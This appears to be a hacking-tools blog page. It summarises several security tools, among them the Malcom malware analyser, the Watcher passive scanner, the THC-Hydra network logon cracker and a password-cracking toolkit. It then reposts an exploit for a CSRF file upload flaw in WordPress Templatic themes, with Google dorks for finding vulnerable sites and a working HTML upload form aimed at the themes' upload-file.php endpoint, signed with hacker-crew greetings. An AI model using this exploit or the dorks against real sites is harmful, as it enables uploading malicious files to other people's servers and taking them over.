Check the wiki for a Quickstart and some nice screenshots.
In the near future, it will also become a collaborative tool (coming soon!)
[Download]
Malcom can help you:
- detect central command and control (C&C) servers
- understand peer-to-peer networks
- observe DNS fast-flux infrastructures
- quickly determine if a network artifact is 'known-bad'
Check the wiki for a Quickstart and some nice screenshots.
In the near future, it will also become a collaborative tool (coming soon!)
[Download]
Watcher [passive Web-security scanner ]
Watcher is a runtime passive-analysis tool for HTTP-based Web
applications. Being passive means it won't damage production systems,
it's completely safe to use in Cloud computing, shared hosting, and
dedicated hosting environments. Watcher detects Web-application
security issues as well as operational configuration issues. Watcher
provides pen-testers hot-spot detection for vulnerabilities, developers
quick sanity checks, and auditors PCI compliance auditing. It looks for
issues related to mashups, user-controlled payloads (potential XSS),
cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer
leaks, information disclosure, Unicode, and more.
Major Features:- Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
- Works seamlessly with complex Web 2.0 applications while you drive the Web browser
- Non-intrusive, will not raise alarms or damage production sites
- Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
- Configurable domains with wildcard support
- Extensible framework for adding new checks
Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com.
Fiddler provides all of the rich functionality of a good Web/HTTP
proxy. With Fiddler you can capture all HTTP traffic, intercept and
modify, replay requests, and much much more. Fiddler provides the HTTP
proxy framework for Watcher to work in, allowing for seamless
integration with today’s complex Web 2.0 or Rich Internet Applications.
Watcher runs silently in the background while you drive your browser
and interact with the Web-application.
Watcher is built in C# as a
small framework with 30+ checks already included. It's built so that
new checks can be easily created to perform custom audits specific to
your organizational policies, or to perform more general-purpose
security assessments. Examples of the types of issues Watcher will
currently identify:
- ASP.NET VIEWSTATE insecure configurations
- JavaServer MyFaces ViewState without cryptographic protections
- Cross-domain stylesheet and javascript references
- User-controllable cross-domain references
- User-controllable attribute values such as href, form action, etc.
- User-controllable javascript events (e.g. onclick)
- Cross-domain form POSTs
- Insecure cookies which don't set the HTTPOnly or secure flags
- Open redirects which can be abused by spammers and phishers
- Insecure Flash object parameters useful for cross-site scripting
- Insecure Flash crossdomain.xml
- Insecure Silverlight clientaccesspolicy.xml
- Charset declarations which could introduce vulnerability (non-UTF-8)
- User-controllable charset declarations
- Dangerous context-switching between HTTP and HTTPS
- Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
- Potential HTTP referer leaks of sensitive user-information
- Potential information leaks in URL parameters
- Source code comments worth a closer look
- Insecure authentication protocols like Digest and Basic
- SSL certificate validation errors
- SSL insecure protocol issues (allowing SSL v2)
- Unicode issues with invalid byte streams
- Sharepoint insecurity checks
- more….
THC-Hydra v7.6
Hydra is a parallelized network logon cracker which supports numerous
protocols to attack, new modules are easy to add, beside that, it is
flexible and very fast.
Features
- IPv6 Support
- Graphic User Interface
- Internationalized support (RFC 4013)
- HTTP proxy support
- SOCKS proxy support
The tool supports the following protocols:
Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL,
VNC, ICQ, Socks5, PCNFS, Cisco and more.
Password Analysis & Cracking Kit
PACK (Password Analysis and Cracking Toolkit) is a collection of
utilities developed to aid in analysis of password lists in order to
enhance password cracking through pattern detection of masks, rules,
character-sets and other password characteristics. The toolkit generates
valid input files for Hashcat family of password crackers.
NOTE: The toolkit itself is not able to crack passwords, but instead
designed to make operation of password crackers more efficient.
Wordpress Templatic Themes CSRF File Upload Vulnerability
#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 31/03/2014
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/wordpress-themes-store/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
CSRF File Upload Vulnerability
<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
">
<br>
</br>
<input name="uploadfile[]" type="file" />
<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>
File Access :
Note :
Script CSRF equate with dork you use
########################################
#Greetz : SANJUNGAN JIWA , All Indonesian H4xor
#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,
########################################
# 90952935D5011A31 1337day.com [2014-04-03] 69BF4D7EF87E2E8E #
Subscribe to:
Posts (Atom)
0 comments:
Never Forget To Say Thanks :D